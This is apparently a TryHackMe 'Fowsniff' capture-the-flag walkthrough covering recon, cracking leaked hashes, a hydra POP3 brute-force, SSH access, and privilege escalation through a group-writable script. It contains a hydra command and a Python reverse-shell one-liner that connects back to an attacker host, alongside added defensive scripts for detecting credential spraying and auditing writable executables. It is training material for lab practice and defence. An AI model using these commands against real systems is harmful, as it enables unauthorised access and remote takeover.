TryHackMe | Fowsniff 1 Walkthrough
A beginner-friendly CTF challenge
This walkthrough is written as part of the Master Certificate in Cybersecurity (Red Team) that I am pursuing from HackeU.
Reconnaissance
Starting with an nmap scan.
Port 80 is open, so there is a web page to look at, and ports 110 (POP3) and 143 (IMAP) are also open, which might be interesting.
Checking the webpage
On the web page we can see a Twitter account username.
This Twitter account had a Pastebin link to leaked usernames and passwords.
We get a list of passwords stored as MD5 hashes (MD5 is a hash, not encryption, so they cannot be decrypted, only matched against guesses).
Saved all the hashes to a file and looked them up in an online hash-cracking service.
Since POP3 is available, we can use these leaked credentials to brute-force the POP3 login with hydra:
hydra pop3://<IP> -L users.txt -P passw.txt
And we find a valid username and password pair.
Connecting to the POP3 service with netcat and logging in with the recovered credentials.
The mailbox holds two messages, and the information we need for the flags is in them.
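From the blue-team side, the hydra run above is very visible in the mail server's logs: one source address, many failed logins against many different accounts in a short window, then a success. The following detector is an added example (my own code, not from the original post). The log lines are constructed to look like Dovecot's pop3-login messages; the exact format of your own server's logs should be checked before reusing the regex.

```python
import re
from collections import defaultdict
from datetime import datetime

# Matches constructed Dovecot-style pop3-login lines (assumed format).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[\d.]+)"
)

# Constructed sample log: a credential-stuffing burst from 10.0.0.5 that ends
# in a successful login, plus ordinary activity from another address.
SAMPLE_LOG = [
    "Mar 10 12:00:01 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<alice>, method=PLAIN, rip=10.0.0.5, lip=10.0.0.2",
    "Mar 10 12:00:02 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<bob>, method=PLAIN, rip=10.0.0.5, lip=10.0.0.2",
    "Mar 10 12:00:03 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<carol>, method=PLAIN, rip=10.0.0.5, lip=10.0.0.2",
    "Mar 10 12:00:04 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<dave>, method=PLAIN, rip=10.0.0.5, lip=10.0.0.2",
    "Mar 10 12:00:05 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<erin>, method=PLAIN, rip=10.0.0.5, lip=10.0.0.2",
    "Mar 10 12:00:06 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<frank>, method=PLAIN, rip=10.0.0.5, lip=10.0.0.2",
    "Mar 10 12:00:09 mail dovecot: pop3-login: Login: user=<carol>, method=PLAIN, rip=10.0.0.5, lip=10.0.0.2, mpid=1234",
    "Mar 10 12:30:00 mail dovecot: pop3-login: Login: user=<bob>, method=PLAIN, rip=192.168.1.20, lip=10.0.0.2, mpid=1235",
    "Mar 10 12:31:00 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<bob>, method=PLAIN, rip=192.168.1.20, lip=10.0.0.2",
]


def parse(line):
    """Return (timestamp, source_ip, user, success) or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog has no year; fine for intra-day deltas
    return ts, m["rip"], m["user"], m["event"] == "Login"


def detect_spray(lines, window_seconds=60, min_failures=5, min_users=3):
    """Flag source IPs with >= min_failures failed POP3 logins spread over
    >= min_users accounts inside a sliding window, and record which accounts
    that source logged into successfully afterwards (the stuffing that worked)."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec:
            by_ip[rec[1]].append(rec)

    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort()
        fails = [r for r in recs if not r[3]]
        for i, start in enumerate(fails):
            window = [r for r in fails[i:] if (r[0] - start[0]).total_seconds() <= window_seconds]
            users = {r[2] for r in window}
            if len(window) >= min_failures and len(users) >= min_users:
                later_success = [r[2] for r in recs if r[3] and r[0] >= start[0]]
                alerts[ip] = {"failures": len(window), "users": sorted(users), "success_after": later_success}
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_spray(SAMPLE_LOG).items():
        print(ip, info)
```

The "success_after" field is the part worth alerting on at high priority: a burst of failures followed by a login from the same address is the signature of a leaked credential list being replayed, and the affected account should be reset rather than just the source blocked.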
retr 1
The first message contains the password for the SSH login.
retr 2
The second message reveals the username for the SSH login as well.
Using these credentials to log in via SSH
and we are finally in!
Looking for files that belong to the users group:
find / -group users -type f 2>/dev/null
The interesting one is /opt/cube/cube.sh, a script that our account is able to modify.
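The reason cube.sh matters is that a script which one group can rewrite and which something privileged later executes is a privilege-escalation path. As an added example (my own code, not part of the original walkthrough), here is the same search done from the auditing side: walk a tree and report regular files that are both executable and writable by group or other. The demo tree, including a stand-in cube.sh, is constructed in a temporary directory so the script runs without touching the real system.

```python
import os
import stat
import tempfile


def audit_writable_scripts(root):
    """Return sorted paths under root of regular files that are executable by
    anyone and writable by group or other. Any such file that a privileged
    process (cron, login hooks, a sudo rule) invokes lets a low-privilege
    group member run code as that process."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(mode):
                continue
            writable = mode & (stat.S_IWGRP | stat.S_IWOTH)
            executable = mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
            if writable and executable:
                hits.append(path)
    return sorted(hits)


def build_demo_tree(base):
    """Constructed fixture: a group-writable script (should be flagged) and a
    script only its owner can write (should not)."""
    os.makedirs(os.path.join(base, "opt", "cube"), exist_ok=True)
    bad = os.path.join(base, "opt", "cube", "cube.sh")
    good = os.path.join(base, "opt", "safe.sh")
    for path in (bad, good):
        with open(path, "w") as f:
            f.write("#!/bin/sh\necho hello\n")
    os.chmod(bad, 0o775)   # rwxrwxr-x: every group member can rewrite it
    os.chmod(good, 0o755)  # rwxr-xr-x: only the owner can
    return bad, good


def run_demo():
    """Build the fixture, audit it, and return (flagged, bad_path, good_path)."""
    with tempfile.TemporaryDirectory() as tmp:
        bad, good = build_demo_tree(tmp)
        flagged = audit_writable_scripts(tmp)
        return flagged, bad, good


if __name__ == "__main__":
    flagged, bad, good = run_demo()
    print("flagged:", flagged)
    print("expected only:", bad)
```

The fix on a real host is the mirror image of the finding: scripts run by root should be owned by root with mode 755 or tighter, and the directory holding them must not be group-writable either, since a writable directory lets the file be replaced even when the file itself is locked down.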
Editing cube.sh and writing our reverse shell payload into it (straight quotes; the curly quotes the original post was rendered with would be a syntax error):
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Once cube.sh is executed, our listener on port 4444 receives a reverse shell
and we find the root flag.
Thanks for reading.